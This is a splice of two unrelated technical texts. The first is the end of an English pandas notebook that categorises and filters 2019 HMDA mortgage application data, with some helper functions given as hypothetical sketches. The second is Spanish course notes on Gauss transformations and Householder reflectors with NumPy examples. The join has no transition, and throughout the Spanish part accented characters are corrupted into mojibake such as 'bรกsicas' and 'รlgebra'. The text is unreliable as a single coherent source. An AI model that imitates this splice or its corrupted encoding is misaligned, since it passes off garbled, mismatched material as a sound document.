hmda19_df['applicant_age_cat'].value_counts(dropna = False)
```
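`categorize_age` is another imported helper. The public LAR file reports `applicant_age` in bands (`<25`, `25-34`, ..., `>74`) plus the `8888` code, so a sketch consistent with the category list above could look like this (the exact band labels are assumptions about the raw values):
```
### Hypothetical sketch of categorize_age -- assumes the public LAR age bands as raw values
AGE_MAP = {'<25': '1', '25-34': '2', '35-44': '3', '45-54': '4',
           '55-64': '5', '65-74': '6', '>74': '7', '8888': '8'}

def categorize_age_sketch(row):
    """Map the reported applicant_age band to the numeric categories listed above."""
    return AGE_MAP.get(row['applicant_age'], '8')   # default to 'Not Applicable'
```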
### 11. Income and Loan Amount Log
```
hmda19_df['income'] = pd.to_numeric(hmda19_df['income'])
hmda19_df['loan_amount'] = pd.to_numeric(hmda19_df['loan_amount'])
hmda19_df['income_log'] = np.log(hmda19_df['income'])
hmda19_df['loan_log'] = np.log(hmda19_df['loan_amount'])
```
### 12. Applicant Sex
- 1: Male
- 2: Female
- 3: Information not provided
- 4: Not Applicable
- 5: No Co-Applicant
- 6: Marked Both
```
sex_df = pd.DataFrame(hmda19_df['applicant_sex'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_sex', 'applicant_sex': 'count'})
sex_df = sex_df.drop(columns = ['count'], axis = 1)
sex_df['applicant_sex_cat'] = sex_df.apply(categorize_sex, axis = 1)
```
#### New applicant sex categories
- 1: Male
- 2: Female
- 3: Not applicable
- 4: Marked both sexes
```
hmda19_df = pd.merge(hmda19_df, sex_df, how = 'left', on = ['applicant_sex'])
hmda19_df['applicant_sex_cat'].value_counts(dropna = False)
```
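`categorize_sex` collapses the six reported codes into the four categories above. A sketch of that mapping follows; grouping codes 3, 4 and 5 into "Not applicable" is inferred from the two lists, not taken from the helper itself.
```
### Hypothetical sketch of categorize_sex
def categorize_sex_sketch(row):
    """Map applicant_sex codes 1-6 to the condensed applicant_sex_cat codes."""
    sex = row['applicant_sex']
    if sex in ('1', '2'):    # Male / Female pass through unchanged
        return sex
    elif sex == '6':         # applicant marked both sexes
        return '4'
    else:                    # not provided, not applicable, or no co-applicant
        return '3'
```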
### 13. Automated Underwriting Systems
- 1: Only one AUS was used
- 2: Same AUS was used multiple times
- 3: Different AUS were used
- 4: Exempt
```
hmda19_df['aus_cat'].value_counts(dropna = False)
underwriter_df = pd.DataFrame(hmda19_df.groupby(by = ['aus_1', 'aus_cat']).size()).reset_index().\
rename(columns = {0: 'count'})
underwriter_df['main_aus'] = underwriter_df.apply(categorize_underwriter, axis = 1)
underwriter_df = underwriter_df.drop(columns = ['count'], axis = 1)
```
#### Main AUS
- 1: Desktop Underwriter
- 2: Loan Prospector
- 3: Technology Open to Approved Lenders
- 4: Guaranteed Underwriting System
- 5: Other
- 6: No main AUS
- 7: Not Applicable
```
hmda19_df = pd.merge(hmda19_df, underwriter_df, how = 'left', on = ['aus_1', 'aus_cat'])
hmda19_df['main_aus'].value_counts(dropna = False)
```
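`categorize_underwriter` works off both `aus_1` and `aus_cat`. The sketch below assumes the standard HMDA `aus-1` codes (1 Desktop Underwriter, 2 Loan Prospector, 3 TOTAL Scorecard, 4 GUS, 6 not applicable, other values for other systems) and assigns "No main AUS" whenever different systems were used; the real helper's rules may differ.
```
### Hypothetical sketch of categorize_underwriter -- code meanings and rules are assumptions
def categorize_underwriter_sketch(row):
    """Pick a main AUS from aus_1 when a single system dominated, otherwise flag it."""
    if row['aus_cat'] == '3':                         # different AUS were used
        return '6'                                    # no main AUS
    if row['aus_1'] in ('1', '2', '3', '4'):          # DU, LP, TOTAL, GUS
        return row['aus_1']
    if row['aus_1'] == '6' or row['aus_cat'] == '4':  # not applicable or exempt
        return '7'
    return '5'                                        # any other system
```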
### 14. Loan Term
```
loanterm_df = pd.DataFrame(hmda19_df['loan_term'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'loan_term', 'loan_term': 'count'})
loanterm_df.loc[(loanterm_df['loan_term'] != 'Exempt'), 'em_loan_term'] = loanterm_df['loan_term']
loanterm_df['em_loan_term'] = pd.to_numeric(loanterm_df['em_loan_term'])
loanterm_df['mortgage_term'] = loanterm_df.apply(categorize_loan_term, axis = 1)
loanterm_df = loanterm_df.drop(columns = ['count', 'em_loan_term'])
```
#### Mortgage Term
- 1: 30 year mortgage
- 2: Less than 30 years
- 3: More than 30 years
- 4: Not applicable
```
hmda19_df = pd.merge(hmda19_df, loanterm_df, how = 'left', on = ['loan_term'])
hmda19_df['mortgage_term'].value_counts(dropna = False)
```
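`categorize_loan_term` buckets the term around the standard 360-month mortgage. A sketch consistent with the categories above, assuming `em_loan_term` is the term in months:
```
### Hypothetical sketch of categorize_loan_term -- assumes em_loan_term is in months
def categorize_loan_term_sketch(row):
    """Bucket loan terms around the standard 360-month (30-year) mortgage."""
    term = row['em_loan_term']
    if pd.isnull(term):      # NaN and 'Exempt' terms
        return '4'
    elif term == 360:
        return '1'
    elif term < 360:
        return '2'
    else:
        return '3'
```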
### 15. Tract MSA Income Percentage
```
tractmsa_income_df = pd.DataFrame(hmda19_df['tract_to_msa_income_percentage'].value_counts(dropna = False)).\
reset_index().rename(columns = {'index': 'tract_to_msa_income_percentage',
'tract_to_msa_income_percentage': 'count'})
tractmsa_income_df['tract_msa_ratio'] = pd.to_numeric(tractmsa_income_df['tract_to_msa_income_percentage'])
tractmsa_income_df['lmi_def'] = tractmsa_income_df.apply(categorize_lmi, axis = 1)
tractmsa_income_df = tractmsa_income_df.drop(columns = ['count', 'tract_msa_ratio'], axis = 1)
```
#### LMI Definition
- 1: Low
- 2: Moderate
- 3: Middle
- 4: Upper
- 5: None
```
hmda19_df = pd.merge(hmda19_df, tractmsa_income_df, how = 'left', on = ['tract_to_msa_income_percentage'])
hmda19_df['lmi_def'].value_counts(dropna = False)
```
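`categorize_lmi` maps the tract-to-MSA income percentage into the buckets above. The sketch below uses conventional FFIEC-style cut points (below 50 percent low, 50 to under 80 moderate, 80 to under 120 middle, 120 and above upper); the exact thresholds in the real helper are assumptions here.
```
### Hypothetical sketch of categorize_lmi -- FFIEC-style cut points are assumed
def categorize_lmi_sketch(row):
    """Bucket tract_msa_ratio into the low/moderate/middle/upper definitions above."""
    ratio = row['tract_msa_ratio']
    if pd.isnull(ratio):
        return '5'           # none: no tract income data
    elif ratio < 50:
        return '1'           # low
    elif ratio < 80:
        return '2'           # moderate
    elif ratio < 120:
        return '3'           # middle
    else:
        return '4'           # upper
```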
### 16. Filter:
#### Conventional and FHA, first-lien, home-purchase loans on one-to-four-unit, site-built properties that the applicant will occupy as a principal residence
```
one_to_four = ['1', '2', '3', '4']
hmda19_df2 = hmda19_df[((hmda19_df['loan_type'] == '1') | (hmda19_df['loan_type'] == '2'))\
& (hmda19_df['occupancy_type'] == '1') &\
(hmda19_df['total_units'].isin(one_to_four)) &\
(hmda19_df['loan_purpose'] == '1') &\
(hmda19_df['action_taken'] != '6') &\
(hmda19_df['construction_method'] == '1') &\
(hmda19_df['lien_status'] == '1') &\
(hmda19_df['business_or_commercial_purpose'] != '1')].copy()
print('hmda19_df: ' + str(len(hmda19_df)))
print('hmda19_df2: ' + str(len(hmda19_df2)))
```
### 17. Write new dataframe to CSV
```
hmda19_df2.info()
hmda19_df2.to_csv('../../data/hmda_lar/cleaned_data/2_hmda2019_210823.csv', index = False)
```
(OTBALN)=
# 2.1 Operaciones y transformaciones bรกsicas del รlgebra Lineal Numรฉrica
```{admonition} Notas para contenedor de docker:
Comando de docker para ejecuciรณn de la nota de forma local:
nota: cambiar `<ruta a mi directorio>` por la ruta de directorio que se desea mapear a `/datos` dentro del contenedor de docker.
`docker run --rm -v <ruta a mi directorio>:/datos --name jupyterlab_optimizacion -p 8888:8888 -d palmoreck/jupyterlab_optimizacion:2.1.4`
password para jupyterlab: `qwerty`
Detener el contenedor de docker:
`docker stop jupyterlab_optimizacion`
Documentaciรณn de la imagen de docker `palmoreck/jupyterlab_optimizacion:2.1.4` en [liga](https://github.com/palmoreck/dockerfiles/tree/master/jupyterlab/optimizacion).
```
---
Nota generada a partir de [liga1](https://www.dropbox.com/s/fyqwiqasqaa3wlt/3.1.1.Multiplicacion_de_matrices_y_estructura_de_datos.pdf?dl=0), [liga2](https://www.dropbox.com/s/jwu8lu4r14pb7ut/3.2.1.Sistemas_de_ecuaciones_lineales_eliminacion_Gaussiana_y_factorizacion_LU.pdf?dl=0) y [liga3](https://www.dropbox.com/s/s4ch0ww1687pl76/3.2.2.Factorizaciones_matriciales_SVD_Cholesky_QR.pdf?dl=0).
```{admonition} Al final de esta nota el y la lectora:
:class: tip
* Entenderá cómo utilizar transformaciones típicas en el álgebra lineal numérica en la que se basan muchos de los algoritmos del análisis numérico. En específico aprenderá cómo aplicar las transformaciones de Gauss, reflexiones de Householder y rotaciones Givens a vectores y matrices.
* Se familiarizará con la notación vectorial y matricial de las operaciones básicas del álgebra lineal numérica.
```
Las operaciones bรกsicas del รlgebra Lineal Numรฉrica podemos dividirlas en vectoriales y matriciales.
## Vectoriales
* **Transponer:** $\mathbb{R}^{n \times 1} \rightarrow \mathbb{R} ^{1 \times n}$: $y = x^T$ entonces $x = \left[ \begin{array}{c} x_1 \\ x_2 \\ \vdots \\ x_n \end{array} \right ]$ y se tiene: $y = x^T = [x_1, x_2, \dots, x_n].$
* **Suma:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x + y$ entonces $z_i = x_i + y_i$
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $y = \alpha x$ entonces $y_i = \alpha x_i$.
* **Producto interno estรกndar o producto punto:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}$: $c = x^Ty$ entonces $c = \displaystyle \sum_{i=1}^n x_i y_i$.
* **Multiplicaciรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x.*y$ entonces $z_i = x_i y_i$.
* **Divisiรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x./y$ entonces $z_i = x_i /y_i$ con $y_i \neq 0$.
* **Producto exterior o *outer product*:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^{n \times n}$: $A = xy^T$ entonces $A[i, :] = x_i y^T$ con $A[i,:]$ el $i$-รฉsimo renglรณn de $A$.
## Matriciales
* **Transponer:** $\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{n \times m}$: $C = A^T$ entonces $c_{ij} = a_{ji}$.
* **Sumar:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A + B$ entonces $c_{ij} = a_{ij} + b_{ij}$.
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = \alpha A$ entonces $c_{ij} = \alpha a_{ij}$
* **Multiplicaciรณn por un vector:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{n} \rightarrow \mathbb{R}^{m}$: $y = Ax$ entonces $y_i = \displaystyle \sum_{j=1}^n a_{ij}x_j$.
* **Multiplicaciรณn entre matrices:** $\mathbb{R}^{m \times k} \times \mathbb{R}^{k \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = AB$ entonces $c_{ij} = \displaystyle \sum_{r=1}^k a_{ir}b_{rj}$.
* **Multiplicaciรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A.*B$ entonces $c_{ij} = a_{ij}b_{ij}$.
* **Divisiรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A./B$ entonces $c_{ij} = a_{ij}/b_{ij}$ con $b_{ij} \neq 0$.
**Como ejemplos de transformaciones bรกsicas del รlgebra Lineal Numรฉrica se encuentran:**
(TGAUSS)=
## Transformaciones de Gauss
En esta sección suponemos que $A \in \mathbb{R}^{n \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}$ $\forall i,j=1,2,\dots,n$.
```{margin}
Como ejemplo de vector canรณnico tenemos: $e_1=(1,0)^T$ en $\mathbb{R}^2$ o $e_3 = (0,0,1,0,0)$ en $\mathbb{R}^5$.
```
Considรฉrese al vector $a \in \mathbb{R}^{n}$ y $e_k \in \mathbb{R}^n$ el $k$-รฉsimo vector canรณnico: vector con un $1$ en la posiciรณn $k$ y ceros en las entradas restantes.
```{admonition} Definiciรณn
Una transformaciรณn de Gauss estรก definida de forma general como $L_k = I_n - \ell_ke_k^T$ con $\ell_k = (0,0,\dots,\ell_{k+1,k},\dots,\ell_{n,k})^T$ y $\ell_{i,k}=\frac{a_{ik}}{a_{kk}} \forall i=k+1,\dots,n$.
$a_{kk}$ se le nombra **pivote** y **debe ser diferente de cero**.
```
Las transformaciones de Gauss se utilizan para hacer ceros por debajo del **pivote**.
(EG1)=
### Ejemplo aplicando transformaciones de Gauss a un vector
Considรฉrese al vector $a=(-2,3,4)^T$. Definir una transformaciรณn de Gauss para hacer ceros por debajo de $a_1$ y otra transformaciรณn de Gauss para hacer cero la entrada $a_3$
**Soluciรณn:**
```
import numpy as np
import math
np.set_printoptions(precision=3, suppress=True)
```
a)Para hacer ceros por debajo del **pivote** $a_1 = -2$:
```
a = np.array([-2,3,4])
pivote = a[0]
```
```{margin}
Recuerda la definiciรณn de $\ell_1=(0, \frac{a_2}{a_1}, \frac{a_3}{a_1})^T$
```
```
l1 = np.array([0,a[1]/pivote, a[2]/pivote])
```
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1a = a - \ell_1 e_1^Ta$.**
```
```
L1_a = a-l1*(e1.dot(a))
print(L1_a)
```
A continuaciรณn se muestra que el producto $L_1 a$ si se construye $L_1$ es equivalente a lo anterior:
```{margin}
$L_1 = I_3 - \ell_1 e_1^T$.
```
```
L1 = np.eye(3) - np.outer(l1,e1)
print(L1)
print(L1@a)
```
b) Para hacer ceros por debajo del **pivote** $a_2 = 3$:
```
a = np.array([-2,3,4])
pivote = a[1]
```
```{margin}
Recuerda la definiciรณn de $\ell_2=(0, 0, \frac{a_3}{a_2})^T$
```
```
l2 = np.array([0,0, a[2]/pivote])
```
```{margin}
Usamos $e_2$ pues se desea hacer ceros en las entradas debajo de la segunda.
```
```
e2 = np.array([0,1,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_2$, directamente se tiene $L_2a = a - \ell_2 e_2^Ta$.**
```
```
L2_a = a-l2*(e2.dot(a))
print(L2_a)
```
A continuaciรณn se muestra que el producto $L_2 a$ si se construye $L_2$ es equivalente a lo anterior:
```{margin}
$L_2 = I_3 - \ell_2 e_2^T$.
```
```
L2 = np.eye(3) - np.outer(l2,e2)
print(L2)
print(L2@a)
```
(EG2)=
### Ejemplo aplicando transformaciones de Gauss a una matriz
Si tenemos una matriz $A \in \mathbb{R}^{3 \times 3}$ y queremos hacer ceros por debajo de su **diagonal** y tener una forma **triangular superior**, realizamos los productos matriciales:
$$L_2 L_1 A$$
donde: $L_1, L_2$ son transformaciones de Gauss.
Posterior a realizar el producto $L_2 L_1 A$ se obtiene una **matriz triangular superior:**
$$
L_2L_1A = \left [
\begin{array}{ccc}
* & * & *\\
0 & * & * \\
0 & 0 & *
\end{array}
\right ]
$$
**Ejemplo:**
a) Utilizando $L_1$
```
A = np.array([[-1, 2, 5],
[4, 5, -7],
[3, 0, 8]], dtype=float)
print(A)
```
Para hacer ceros por debajo del **pivote** $a_{11} = -1$:
```
pivote = A[0, 0]
```
```{margin}
Recuerda la definiciรณn de $\ell_1=(0, \frac{a_{21}}{a_{11}}, \frac{a_{31}}{a_{11}})^T$
```
```
l1 = np.array([0,A[1,0]/pivote, A[2,0]/pivote])
e1 = np.array([1,0,0])
```
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1 A[1:3,1] = A[1:3,1] - \ell_1 e_1^T A[1:3,1]$.**
```
```
L1_A_1 = A[:,0]-l1*(e1.dot(A[:,0]))
print(L1_A_1)
```
**Y se debe aplicar $L_1$ a las columnas nรบmero 2 y 3 de $A$ para completar el producto $L_1A$:**
```{margin}
Aplicando $L_1$ a la segunda columna de $A$: $A[1:3,2]$.
```
```
L1_A_2 = A[:,1]-l1*(e1.dot(A[:,1]))
print(L1_A_2)
```
```{margin}
Aplicando $L_1$ a la tercer columna de $A$: $A[1:3,3]$.
```
```
L1_A_3 = A[:,2]-l1*(e1.dot(A[:,2]))
print(L1_A_3)
```
A continuaciรณn se muestra que el producto $L_1 A$ si se construye $L_1$ es equivalente a lo anterior:
```{margin}
$L_1 = I_3 - \ell_1 e_1^T$.
```
```
L1 = np.eye(3) - np.outer(l1,e1)
print(L1)
print(L1 @ A)
```
```{admonition} Observaciรณn
:class: tip
Al aplicar $L_1$ a la primer columna de $A$ **siempre** obtenemos ceros por debajo del pivote que en este caso es $a_{11}$.
```
(EG2.1)=
**Despuรฉs de hacer la multiplicaciรณn $L_1A$ en cualquiera de los dos casos (construyendo o no explรญcitamente $L_1$) no se modifica el primer renglรณn de $A$:**
```
print(A)
```
```{margin}
Este es el primer renglรณn de $A$.
```
```
print(A[0,:])
```
```{margin}
Tomando el primer renglรณn del producto $L_1A$.
```
```
print((L1 @ A)[0,:])
```
**por lo que la multiplicaciรณn $L_1A$ entonces modifica del segundo renglรณn de $A$ en adelante y de la segunda columna de $A$ en adelante.**
```{admonition} Observaciรณn
:class: tip
Dada la forma de $L_1 = I_3 - \ell_1e_1^T$, al hacer la multiplicaciรณn por la segunda y tercer columna de $A$ se tiene:
$$e_1^T A[1:3,2] = A[0,2]$$
$$e_1^T A[1:3,3] = A[0,3]$$
respectivamente.
```
```{margin}
El resultado de este producto es un escalar.
```
```
print(e1.dot(A[:, 1]))
```
```{margin}
El resultado de este producto es un escalar.
```
```
print(e1.dot(A[:, 2]))
```
y puede escribirse de forma compacta:
$$e_1^T A[1:3,2:3] = A[0, 2:3]$$
```
print(A[0, 1:3]) #observe that we have to use 2+1=3 as the second number after ":" in 1:3
print(A[0, 1:]) #also we could have use this statement
```
Entonces los productos $\ell_1 e_1^T A[:,2]$ y $\ell_1 e_1^T A[:,3]$ quedan respectivamente como:
$$\ell_1A[0, 2]$$
```
print(l1*A[0,1])
```
$$\ell_1A[0,3]$$
```
print(l1*A[0, 2])
```
```{admonition} Observaciรณn
:class: tip
En los dos cรกlculos anteriores, las primeras entradas son iguales a $0$ por lo que es consistente con el hecho que รบnicamente se modifican dos entradas de la segunda y tercer columna de $A$.
```
De forma compacta y aprovechando funciones en *NumPy* como [np.outer](https://numpy.org/doc/stable/reference/generated/numpy.outer.html) se puede calcular lo anterior como:
```
print(np.outer(l1[1:3],A[0,1:3]))
print(np.outer(l1[1:],A[0,1:])) #also we could have use this statement
```
Y finalmente la aplicaciรณn de $L_1$ al segundo renglรณn y segunda columna en adelante de $A$ queda:
```{margin}
Observa que por la definiciรณn de la transformaciรณn de Gauss, **no necesitamos construir a la matriz $L_1$, directamente se tiene $L_1 A = A - \ell_1 e_1^T A$ y podemos aprovechar lo anterior para sรณlo operar de la segunda columna y segundo renglรณn en adelante.**
```
```
print(A[1:, 1:] - np.outer(l1[1:],A[0,1:]))
```
Compรกrese con:
```
print(L1 @ A)
```
Entonces sรณlo falta colocar el primer renglรณn y primera columna al producto. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
```
A_aux = A[1:, 1:] - np.outer(l1[1:],A[0,1:])
m, n = A.shape
number_of_zeros = m-1
A_aux_2 = np.column_stack((np.zeros(number_of_zeros), A_aux)) # stack two zeros
print(A_aux_2)
A_aux_3 = np.row_stack((A[0, :], A_aux_2))
print(A_aux_3)
```
que es el resultado de:
```
print(L1 @ A)
```
**Lo que falta para obtener una matriz triangular superior es hacer la multiplicaciรณn $L_2L_1A$.** Para este caso la matriz $L_2=I_3 - \ell_2e_2^T$ utiliza $\ell_2 = \left( 0, 0, \frac{a^{(1)}_{32}}{a^{(1)}_{22}} \right )^T$ donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = L_1A^{(0)}$ y $A^{(0)}=A$.
```{admonition} Ejercicio
:class: tip
Calcular el producto $L_2 L_1 A$ para la matriz anterior y para la matriz:
$$
A = \left [
\begin{array}{ccc}
1 & 4 & -2 \\
-3 & 9 & 8 \\
5 & 1 & -6
\end{array}
\right]
$$
tomando en cuenta que en este caso $L_2$ sรณlo opera del segundo renglรณn y segunda columna en adelante:
<img src="https://dl.dropboxusercontent.com/s/su4z0obupk95vql/transf_Gauss_outer_product.png?dl=0" heigth="550" width="550">
y obtener una matriz triangular superior en cada ejercicio.
```
```{admonition} Comentarios
* Las transformaciones de Gauss se utilizan para la fase de eliminaciรณn del mรฉtodo de eliminaciรณn Gaussiana o tambiรฉn llamada factorizaciรณn $LU$. Ver [Gaussian elimination](https://en.wikipedia.org/wiki/Gaussian_elimination).
* La factorizaciรณn $P, L, U$ que es la $LU$ con permutaciones por pivoteo parcial es un mรฉtodo estable numรฉricamente respecto al redondeo en la prรกctica pero inestable en la teorรญa.
```
(MATORTMATCOLORTONO)=
## Matriz ortogonal y matriz con columnas ortonormales
Un conjunto de vectores $\{x_1, \dots, x_p\}$ en $\mathbb{R}^m$ ($x_i \in \mathbb{R}^m$)es ortogonal si $x_i^Tx_j=0$ $\forall i\neq j$. Por ejemplo, para un conjunto de $2$ vectores $x_1,x_2$ en $\mathbb{R}^3$ esto se visualiza:
<img src="https://dl.dropboxusercontent.com/s/cekagqnxe0grvu4/vectores_ortogonales.png?dl=0" heigth="550" width="550">
```{admonition} Comentarios
* Si el conjunto $\{x_1,\dots,x_n\}$ en $\mathbb{R}^m$ satisface $x_i^Tx_j= \delta_{ij}= \begin{cases}
1 &\text{ si } i=j,\\
0 &\text{ si } i\neq j
\end{cases}$, ver [Kronecker_delta](https://en.wikipedia.org/wiki/Kronecker_delta) se le nombra conjunto **ortonormal**, esto es, constituye un conjunto ortogonal y cada elemento del conjunto tiene norma $2$ o Euclidiana igual a $1$: $||x_i||_2 = 1, \forall i=1,\dots,n$.
* Si definimos a la matriz $X$ con columnas dadas por cada uno de los vectores del conjunto $\{x_1,\dots, x_n\}$: $X=(x_1, \dots , x_n) \in \mathbb{R}^{m \times n}$ entonces la propiedad de que cada par de columnas satisfaga $x_i^Tx_j=\delta_{ij}$ se puede escribir en notaciรณn matricial como $X^TX = I_n$ con $I_n$ la matriz identidad de tamaรฑo $n$ si $n \leq m$ o bien $XX^T=I_m$ si $m \leq n$. A la matriz $X$ se le nombra **matriz con columnas ortonormales**.
* Si cada $x_i$ estรก en $\mathbb{R}^n$ (en lugar de $\mathbb{R}^m$) entonces construรญmos a la matriz $X$ como el punto anterior con la diferencia que $X \in \mathbb{R}^{n \times n}$. En este caso $X$ se le nombra **matriz ortogonal**.
* Entre las propiedades mรกs importantes de las matrices ortogonales o con columnas ortonormales es que son isometrรญas bajo la norma $2$ o Euclidiana y multiplicar por tales matrices es estable numรฉricamente bajo el redondeo, ver {ref}`Condiciรณn de un problema y estabilidad de un algoritmo <CPEA>`.
```
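Un bosquejo mínimo para verificar numéricamente estas propiedades con *NumPy*: el factor $Q$ que regresa `np.linalg.qr` tiene columnas ortonormales, por lo que $Q^TQ=I_n$ y multiplicar por $Q$ preserva la norma $2$.
```
# Bosquejo: verificación numérica de X^T X = I_n y de la isometría bajo la norma 2
rng = np.random.default_rng(2021)
B = rng.normal(size=(5, 3))
Q, _ = np.linalg.qr(B)                  # Q en R^{5x3} con columnas ortonormales
print(Q.T@Q)                            # aproximadamente I_3
print(np.allclose(Q.T@Q, np.eye(3)))
v = np.array([1.0, -2.0, 3.0])
print(np.linalg.norm(Q@v))              # misma norma 2 que v
print(np.linalg.norm(v))
```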
(TREF)=
## Transformaciones de reflexiรณn
En esta sección suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}$ $\forall i=1,2,\dots,m, j=1, 2, \dots, n$.
### Reflectores de Householder
```{margin}
Recuerda que $u^\perp = \{x \in \mathbb{R}^m| u^Tx=0\}$ es un subespacio de $\mathbb{R}^m$ de dimensiรณn $m-1$ y es el complemento ortogonal de $u$.
```
```{admonition} Definiciรณn
Las reflexiones de Householder son matrices **simรฉtricas, ortogonales** y se construyen a partir de un vector $v \neq 0$ definiendo:
$$R = I_m-\beta v v^T$$
con $v \in \mathbb{R}^m - \{0\}$ y $\beta = \frac{2}{v^Tv}$. El vector $v$ se llama **vector de Householder**. La multiplicaciรณn $Rx$ representa la reflexiรณn del vector $x \in \mathbb{R}^m$ a travรฉs del hiperplano $v^\perp$.
```
```{admonition} Comentario
Algunas propiedades de las reflexiones de Householder son: $R^TR = R^2 = I_m$, $R^{-1}=R$, $det(R)=-1$.
```
```{sidebar} Proyector ortogonal elemental
En este dibujo se utiliza el **proyector ortogonal elemental** sobre el complemento ortogonal $u^\perp$ definido como: $P=I_m- u u^T$ y $Px$ es la proyecciรณn ortogonal de $x$ sobre $u^\perp$ . Los proyectores ortogonales elementales **no** son matrices ortogonales, son singulares, son simรฉtricas y $P^2=P$. El proyector ortogonal elemental de $x$ sobre $u^\perp$ tienen $rank$ igual a $m-1$ y el proyector ortogonal de $x$ sobre $span\{u\}$ definido por $I_m-P=uu^T$ tienen $rank$ igual a $1$.
<img src="https://dl.dropboxusercontent.com/s/itjn9edajx4g2ql/elementary_projector_drawing.png?dl=0" heigth="350" width="350">
Recuerda que $span\{u\}$ es el conjunto generado por $u$. Se define como el conjunto de combinaciones lineales de $u$: $span\{u\} = \left \{\displaystyle \sum_{i=1}^m k_i u_i | k_i \in \mathbb{R} \forall i =1,\dots,m \right \}$.
```
Un dibujo que ayuda a visualizar el reflector elemental alrededor de $u^\perp$ en el que se utiliza $u \in \mathbb{R}^m - \{0\}$ , $||u||_2 = 1$ y $R=I_m-2 u u^T$ es el siguiente :
<img src="https://dl.dropboxusercontent.com/s/o3oht181nm8lfit/householder_drawing.png?dl=0" heigth="350" width="350">
Las reflexiones de Householder pueden utilizarse para hacer ceros por debajo de una entrada de un vector.
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al vector $x=(1,2,3)^T$. Definir un reflector de Householder para hacer ceros por debajo de $x_1$.
```
x = np.array([1,2,3])
print(x)
```
Utilizamos la definiciรณn $v=x-||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico para construir al vector de Householder:
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
v = x-np.linalg.norm(x)*e1
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R$, directamente se tiene $R x = x - \beta vv^Tx$.**
```
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
```
print(x-beta*v*(v.dot(x)))
```
El resultado de $Rx$ es $(||x||_2,0,0)^T$ con $||x||_2$ dada por:
```
print(np.linalg.norm(x))
```
```{admonition} Observaciรณn
:class: tip
* Observa que se preserva la norma $2$ o Euclidiana del vector, las matrices de reflexiรณn de Householder son matrices ortogonales y por tanto isometrรญas: $||Rv||_2=||v||_2$.
* Observa que a diferencia de las transformaciones de Gauss con las reflexiones de Householder en general se modifica la primera entrada, ver {ref}`Ejemplo aplicando transformaciones de Gauss a un vector <EG1>`.
```
A continuaciรณn se muestra que el producto $Rx$ si se construye $R$ es equivalente a lo anterior:
```{margin}
$R = I_3 - \beta v v^T$.
```
```
R = np.eye(3)-beta*np.outer(v,np.transpose(v))
print(R)
print(R@x)
```
### Ejemplo aplicando reflectores de Householder a un vector
Considรฉrese al mismo vector $x$ del ejemplo anterior y el mismo objetivo "Definir un reflector de Householder para hacer ceros por debajo de $x_1$.". Otra opciรณn para construir al vector de Householder es $v=x+||x||_2e_1$ con $e_1=(1,0,0)^T$ vector canรณnico:
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera.
```
```
e1 = np.array([1,0,0])
v = x+np.linalg.norm(x)*e1
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R$, directamente se tiene $R x = x - \beta vv^Tx$.**
```
Hacemos ceros por debajo de la primera entrada de $x$ haciendo la multiplicaciรณn matriz-vector $Rx$:
```
print(x-beta*v*(v.dot(x)))
```
```{admonition} Observaciรณn
:class: tip
Observa que difieren en signo las primeras entradas al utilizar $v=x + ||x||_2 e_1$ o $v=x - ||x||_2 e_1$.
```
### ยฟCuรกl definiciรณn del vector de Householder usar?
En cualquiera de las dos definiciones del vector de Householder $v=x \pm ||x||_2 e_1$, la multiplicaciรณn $Rx$ refleja $x$ en el primer eje coordenado (pues se usa $e_1$):
<img src="https://dl.dropboxusercontent.com/s/bfk7gojxm93ah5s/householder_2_posibilites.png?dl=0" heigth="400" width="400">
